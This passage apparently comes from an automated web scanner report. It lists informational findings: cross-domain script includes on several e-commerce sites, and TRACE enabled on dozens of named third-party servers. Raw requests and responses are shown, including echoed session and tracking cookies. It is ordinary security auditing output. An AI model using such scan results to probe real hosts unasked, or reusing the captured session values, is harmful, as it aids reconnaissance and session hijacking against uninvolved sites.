http://t5.trackalyzer.com/trackalyze.js
http://w.sharethis.com/button/buttons.js

Request

GET /cloud/cloud-pricing.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/sitemap.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; casestudiesID=4; __unam=d5ad7d-1324070db49-4656e66c-3; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.3.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 37219
Content-Type: text/html
Set-Cookie: casestudiesID=2; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.325. http://www.tenzing.com/cloud/sign-up-now.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/cloud/sign-up-now.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://t5.trackalyzer.com/trackalyze.js
http://w.sharethis.com/button/buttons.js

Request

GET /cloud/sign-up-now.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/cloud/cloud-pricing.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; casestudiesID=0; __unam=d5ad7d-1324070db49-4656e66c-4; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.4.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 34304
Content-Type: text/html
Set-Cookie: casestudiesID=1; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.326. http://www.tenzing.com/hosting-solutions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/hosting-solutions.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://t5.trackalyzer.com/trackalyze.js
http://w.sharethis.com/button/buttons.js

Request

GET /hosting-solutions.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; __unam=d5ad7d-1324070db49-4656e66c-1; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.1.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 19991
Content-Type: text/html
Set-Cookie: casestudiesID=2; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.327. http://www.tenzing.com/sitemap.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/sitemap.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://t5.trackalyzer.com/trackalyze.js
http://w.sharethis.com/button/buttons.js

Request

GET /sitemap.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/hosting-solutions.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; casestudiesID=3; __unam=d5ad7d-1324070db49-4656e66c-2; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.2.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 21684
Content-Type: text/html
Set-Cookie: casestudiesID=4; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.328. http://www.volusion.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.volusion.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js
http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4
http://www.googleadservices.com/pagead/conversion.js

Request

Response

20.329. http://www.volusion.com/a1/f/OpenSans-Regular-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.volusion.com
Path:	/a1/f/OpenSans-Regular-webfont.woff

Issue detail

The response dynamically includes the following scripts from other domains:

http://a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js
http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4
http://www.googleadservices.com/pagead/conversion.js

Request

GET /a1/f/OpenSans-Regular-webfont.woff HTTP/1.1
Host: www.volusion.com
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQBARQSB=POOOFPOCKKGLAGPPGLMHICIP

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
X-Powered-By: ASP.NET
Content-Length: 23126
Content-Type: text/html
Cache-control: private
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<body id="Volusion" class="Volusion">
<script src="//a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="//a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"src="//www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

20.330. http://www.volusion.com/a1/f/OpenSans-Semibold-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.volusion.com
Path:	/a1/f/OpenSans-Semibold-webfont.woff

Issue detail

The response dynamically includes the following scripts from other domains:

http://a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js
http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4
http://www.googleadservices.com/pagead/conversion.js

Request

GET /a1/f/OpenSans-Semibold-webfont.woff HTTP/1.1
Host: www.volusion.com
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQBARQSB=POOOFPOCKKGLAGPPGLMHICIP

Response

20.331. http://www.youtube.com/embed/kPJh9FWuOks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/kPJh9FWuOks

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-embed_core_module-vflXhboHY.js

Request

Response

20.332. http://www.youtube.com/embed/oxqAPZmFSUU previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/oxqAPZmFSUU

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-embed_core_module-vflXhboHY.js

Request

GET /embed/oxqAPZmFSUU HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response

20.333. http://www.znode.com/znode-multifront/architecture.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.znode.com
Path:	/znode-multifront/architecture.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /znode-multifront/architecture.aspx HTTP/1.1
Host: www.znode.com
Proxy-Connection: keep-alive
Referer: http://www.znode.com/znode-multifront/feature.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=tya5ccuuq2iifp45k0an0045; referer_domain=www.google.com; referer_query=?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio; Tracking_Id=1404119; __utma=58486625.433211037.1315341123.1315341123.1315341123.1; __utmb=58486625.2.10.1315341123; __utmc=58486625; __utmz=58486625.1315341123.1.1.utmgclid=CLLul7r4iKsCFQVrgwodzysJ5Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; visitor_id1852=191471275

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:40:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 64975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_ctl00_Head1"><title>
Ecommerce Architecture | S
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...

20.334. http://www.znode.com/znode-multifront/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.znode.com
Path:	/znode-multifront/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

Response

20.335. http://www.znode.com/znode-multifront/feature.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.znode.com
Path:	/znode-multifront/feature.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET /znode-multifront/feature.aspx HTTP/1.1
Host: www.znode.com
Proxy-Connection: keep-alive
Referer: http://www.znode.com/znode-multifront/default.aspx?pi_ad_id=7270542494&gclid=CLLul7r4iKsCFQVrgwodzysJ5Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=tya5ccuuq2iifp45k0an0045; referer_domain=www.google.com; referer_query=?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio; Tracking_Id=1404119; __utma=58486625.433211037.1315341123.1315341123.1315341123.1; __utmb=58486625.1.10.1315341123; __utmc=58486625; __utmz=58486625.1315341123.1.1.utmgclid=CLLul7r4iKsCFQVrgwodzysJ5Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; visitor_id1852=191471185

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_ctl00_Head1"><title>
Ecommerce Storefront Softw
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...

21. TRACE method is enabled previous next
There are 36 instances of this issue:

http://1215.ic-live.com/
http://ads1.msn.com/
http://afe.specificclick.net/
http://c.statcounter.com/
http://cache.specificmedia.com/
http://channelsun.sun.com/
http://clk.fetchback.com/
http://convctr.overture.com/
http://d.ads.readwriteweb.com/
http://d1.openx.org/
http://deloitte.12hna.com/
http://dev.mysql.com/
http://digg.com/
https://dne.oracle.com/
http://dynpages-mktas.oracle.com/
http://education.oracle.com/
https://education.oracle.com/
http://fido.fetchback.com/
http://imp.fetchback.com/
http://legolas.nexac.com/
http://msnbcmedia.msn.com/
http://optimized-by.rubiconproject.com/
http://ping.crowdscience.com/
http://pixel.everesttech.net/
http://pixel.fetchback.com/
http://r.openx.net/
http://rt.legolas-media.com/
http://serve.directdigitalllc.com/
http://tap.rubiconproject.com/
http://tracker.wordstream.com/
http://tracking.hubspot.com/
http://www.beautyproductsdirect.com/
http://www.fekkai.com/
http://www.fetchback.com/
http://www.gillettevenus.com/
http://www.readwriteweb.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

21.1. http://1215.ic-live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://1215.ic-live.com
Path:	/

Request

TRACE / HTTP/1.0
Host: 1215.ic-live.com
Cookie: f0d12587dfbae9d

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 16:45:56 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from i2a-coll-7
X-Cache-Lookup: NONE from i2a-coll-7:80
Via: 1.0 i2a-coll-7:80 (squid/2.6.STABLE21)
Connection: close

TRACE / HTTP/1.0
Host: 1215.ic-live.com
Cookie: f0d12587dfbae9d; ngx_userid=50.23.123.106:1315327539133; cvt586=106159628; ngx_106159628=2011-09-06:09:45:39; cvt522=33083100; ngx_33083100=2011-09-06:09:45:44; sid1460=1315327539qIJ0arLZTDmI99; pid2=1315301244rR4cN0
...[SNIP]...

21.2. http://ads1.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads1.msn.com
Cookie: 45bbf1c8509a4b1e

Response

HTTP/1.1 200 OK
Server: Footprint 4.8/FPMCP
Mime-Version: 1.0
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Type: message/http
Content-Length: 593
Expires: Tue, 06 Sep 2011 15:00:14 GMT
Connection: close

TRACE / HTTP/1.0
Host: ads1.msn.com
Cookie: 45bbf1c8509a4b1e; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MC1=V=3&GUID=27de0d4a057a405d855bc5c261d99b62; mh=MSFT; CC=US; Sample=43; CULTURE=EN-US; expid=id=c3d56ab0e9ef4d31a12e4ebc6c4c7324&bd=2011-08-25T22:26:18.658&v=
...[SNIP]...

21.3. http://afe.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/

Request

TRACE / HTTP/1.0
Host: afe.specificclick.net
Cookie: 7a4ab0de0301eb37

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 130
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

TRACE / HTTP/1.0
host: afe.specificclick.net
cookie: 7a4ab0de0301eb37; JSESSIONID=f3fe521e99c2f212b60492987a2d; ADVIVA=NOTRACK

21.4. http://c.statcounter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/

Request

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 59057598fa4b9e9c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:45 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 59057598fa4b9e9c; is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0

21.5. http://cache.specificmedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cache.specificmedia.com
Cookie: f53e197770403d15

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:07 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n18 ( origin>CONN)
Content-Length: 347
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
host: ads.specificmedia.com
user-agent: Mozilla/5.0 (compatible; Panther)
accept: */*
via: 1.1 lax-agg-n18.panthercdn.com PWS/1.7.3.3
x-forwarded-for: 50.23.123.106, 66.114.50.83
x-forwarded-ip: 50.23.123.106
x-initial-url: http://cache.specificmedia.com/
cookie: f53e197770403d15; ADVIVA=NOTRACK
connection: keep-alive

21.6. http://channelsun.sun.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://channelsun.sun.com
Path:	/

Request

TRACE / HTTP/1.0
Host: channelsun.sun.com
Cookie: ea51b22241e16837

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5
Server: Sun GlassFish Enterprise Server v2.1
Content-Type: message/http
Content-Length: 96
Date: Tue, 06 Sep 2011 16:13:09 GMT
Connection: close

TRACE /grails/index/home.dispatch HTTP/1.0
host: channelsun.sun.com
cookie: ea51b22241e16837

21.7. http://clk.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/

Request

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: ce10ba4a23a9a782

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: clk.fetchback.com
Cookie: ce10ba4a23a9a782; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; opt=1; cmp=1
...[SNIP]...

21.8. http://convctr.overture.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://convctr.overture.com
Path:	/

Request

TRACE / HTTP/1.0
Host: convctr.overture.com
Cookie: b5945fa6764d0756

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: b5945fa6764d0756; BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=; SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZ
...[SNIP]...

21.9. http://d.ads.readwriteweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.ads.readwriteweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: d.ads.readwriteweb.com
Cookie: e272a21bacc1f45b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:46 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d.ads.readwriteweb.com
Cookie: e272a21bacc1f45b; OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; mobify=0; __qca=P0-110430846-1315341155951; __qseg=Q_D; _fm_bizo=bizo%3Dindustry-business_services%2Clocation-texas%3B
Connection: close
X-Forwarded-For: 50.2
...[SNIP]...

21.10. http://d1.openx.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/

Request

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: 499bc3208bbaf8b1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: 499bc3208bbaf8b1; OAID=eed20980e83e7cfea7f31868510023af
X-Forwarded-For: 50.23.123.106, 10.5.253.2

21.11. http://deloitte.12hna.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://deloitte.12hna.com
Path:	/

Request

TRACE / HTTP/1.0
Host: deloitte.12hna.com
Cookie: 9c55e37e898445f3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:18 GMT
Server: Apache/1.3.26 (Unix) Debian GNU/Linux PHP/4.4.0-0.dotdeb.0 mod_ssl/2.8.9 OpenSSL/0.9.6c
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9c55e37e898445f3
Host: deloitte.12hna.com

21.12. http://dev.mysql.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dev.mysql.com
Path:	/

Request

TRACE / HTTP/1.0
Host: dev.mysql.com
Cookie: 9e0ec2102bd4e024

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:54 GMT
Server: Apache/2.2.19 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dev.mysql.com
Cookie: 9e0ec2102bd4e024; MySQL_S=icd8ngn97qr19vmiubeprn5dg5

21.13. http://digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: 7543b345a20f8fb

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: 7543b345a20f8fb; traffic_control=f00100000060910000168986600130000020084302a10001%3A300%3A112; d=42ac07acc70c6d94d4f647a26c983e282d43b7e0b45ba7abe20c37698a901ebe
Connection: Keep-Alive
X-forwarded-for: 50.23.123.10
...[SNIP]...

21.14. https://dne.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://dne.oracle.com
Path:	/

Request

TRACE / HTTP/1.0
Host: dne.oracle.com
Cookie: 5a4f5828fcbb3d45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:33 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
